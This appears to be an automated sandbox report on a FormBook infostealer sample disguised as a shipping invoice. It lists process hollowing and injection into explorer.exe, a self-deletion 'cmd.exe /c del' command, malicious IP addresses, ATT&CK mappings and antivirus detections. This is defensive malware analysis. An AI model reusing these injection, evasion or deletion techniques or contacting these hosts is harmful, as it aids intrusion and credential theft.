          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]9_2_03704F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372F716 mov eax, dword ptr fs:[00000030h]9_2_0372F716
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]9_2_0379FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]9_2_0379FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]9_2_037D070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]9_2_037D070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]9_2_0373A70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]9_2_0373A70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037437F5 mov eax, dword ptr fs:[00000030h]9_2_037437F5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03718794 mov eax, dword ptr fs:[00000030h]9_2_03718794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]9_2_03787794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]9_2_03787794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]9_2_03787794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371766D mov eax, dword ptr fs:[00000030h]9_2_0371766D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]9_2_037CAE44
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]9_2_037CAE44
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFE3F mov eax, dword ptr fs:[00000030h]9_2_037BFE3F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370E620 mov eax, dword ptr fs:[00000030h]9_2_0370E620
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]9_2_0373A61C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]9_2_0373A61C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]9_2_0370C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]9_2_0370C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]9_2_0370C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03738E00 mov eax, dword ptr fs:[00000030h]9_2_03738E00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1608 mov eax, dword ptr fs:[00000030h]9_2_037C1608
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037316E0 mov ecx, dword ptr fs:[00000030h]9_2_037316E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037176E2 mov eax, dword ptr fs:[00000030h]9_2_037176E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8ED6 mov eax, dword ptr fs:[00000030h]9_2_037D8ED6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03748EC7 mov eax, dword ptr fs:[00000030h]9_2_03748EC7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFEC0 mov eax, dword ptr fs:[00000030h]9_2_037BFEC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037336CC mov eax, dword ptr fs:[00000030h]9_2_037336CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]9_2_037D0EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]9_2_037D0EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]9_2_037D0EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037846A7 mov eax, dword ptr fs:[00000030h]9_2_037846A7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FE87 mov eax, dword ptr fs:[00000030h]9_2_0379FE87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]9_2_0372C577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]9_2_0372C577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03727D50 mov eax, dword ptr fs:[00000030h]9_2_03727D50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03743D43 mov eax, dword ptr fs:[00000030h]9_2_03743D43
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783540 mov eax, dword ptr fs:[00000030h]9_2_03783540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B3D40 mov eax, dword ptr fs:[00000030h]9_2_037B3D40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370AD30 mov eax, dword ptr fs:[00000030h]9_2_0370AD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CE539 mov eax, dword ptr fs:[00000030h]9_2_037CE539
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]9_2_03734D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]9_2_03734D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]9_2_03734D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8D34 mov eax, dword ptr fs:[00000030h]9_2_037D8D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0378A537 mov eax, dword ptr fs:[00000030h]9_2_0378A537
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B8DF1 mov eax, dword ptr fs:[00000030h]9_2_037B8DF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]9_2_0371D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]9_2_0371D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]9_2_037CFDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]9_2_037CFDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]9_2_037CFDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]9_2_037CFDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov ecx, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]9_2_03731DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]9_2_03731DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]9_2_03731DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]9_2_037D05AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]9_2_037D05AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037335A1 mov eax, dword ptr fs:[00000030h]9_2_037335A1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]9_2_0373FD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]9_2_0373FD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10002EDC GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,1_2_10002EDC
          Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10004CBC
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10002ECD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10002ECD
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10007786 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_10007786

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 75.126.100.11 80
          Source: C:\Windows\explorer.exe Network Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exe Network Connect: 95.215.210.10 80
          Source: C:\Windows\explorer.exe Network Connect: 165.227.229.15 80
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 23.88.85.105 80
          Hijacks the control flow in another process
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165050 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771650F0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165180 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165190 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771651A0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7717FEE0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771133C0 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77114760 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770D6590 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770DB510 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770FC490 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7711EE00 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7711EFD0 value: E9
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\cmd.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9F0000
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: explorer.exe, 00000004.00000002.914158425.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10008C6C cpuid 1_2_10008C6C
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,1_2_10008A23
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10004896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_10004896
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9

          Lowering of HIPS / PFW / Operating System Security Settings:

          Uses netsh to modify the Windows network and firewall settings
          Source: unknown Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          | Valid Accounts | Native API 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
          | Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 612 | Obfuscated Files or Information 3 | Security Account Manager | System Information Discovery 124 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Install Root Certificate 1 | NTDS | Security Software Discovery 251 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Virtualization/Sandbox Evasion 3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
          | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
          | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 612 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
          | Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Rundll32 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop |

          Behavior Graph

          [Figure: behavior graph, not reproduced. Behavior Graph ID: 323227; Sample: Shipping INVOICE-BL Shipment..exe; Startdate: 26/11/2020; Architecture: WINDOWS; Score: 100. Process chain: Shipping INVOICE-BL Shipment..exe started rundll32.exe, which started cmd.exe, which injected into explorer.exe, which started netsh.exe, which started cmd.exe, which started conhost.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label | Link |
          | Shipping INVOICE-BL Shipment..exe | 28% | Virustotal | | Browse |
          | Shipping INVOICE-BL Shipment..exe | 45% | ReversingLabs | Win32.Trojan.Woreflint | |

          Dropped Files

          | Source | Detection | Scanner | Label | Link |
          | C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll | 0% | Metadefender | | Browse |
          | C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll | 0% | ReversingLabs | | |
          | C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll | 0% | Metadefender | | Browse |
          | C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll | 2% | ReversingLabs | | |
          | C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe | 0% | Metadefender | | Browse |
          | C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe | 0% | ReversingLabs | | |
          | C:\Users\user\AppData\Local\Temp\Prehnite.dll | 28% | ReversingLabs | Win32.Trojan.Wacatac | |
          | C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe | 0% | Metadefender | | Browse |
          | C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe | 3% | ReversingLabs | | |
          | C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll | 0% | Metadefender | | Browse |
          | C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll | 0% | ReversingLabs | | |

          Unpacked PE Files

          | Source | Detection | Scanner | Label | Link | Download |
          | 2.2.cmd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File |
          | 0.0.Shipping INVOICE-BL Shipment..exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366 | | Download File |
          | 0.2.Shipping INVOICE-BL Shipment..exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366 | | Download File |

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains


Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.0.78.24 | unknown | United States | 2635 | AUTOMATTICUS | true
95.215.210.10 | unknown | Russian Federation | 49055 | NEWIT-ASRU | true
165.227.229.15 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
23.88.85.105 | unknown | United States | 18978 | ENZUINC-US | true
75.126.100.11 | unknown | United States | 36351 | SOFTLAYERUS | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323227
Start date: 26.11.2020
Start time: 15:06:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 2s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Shipping INVOICE-BL Shipment..exe
Cookbook file name: default.jbs
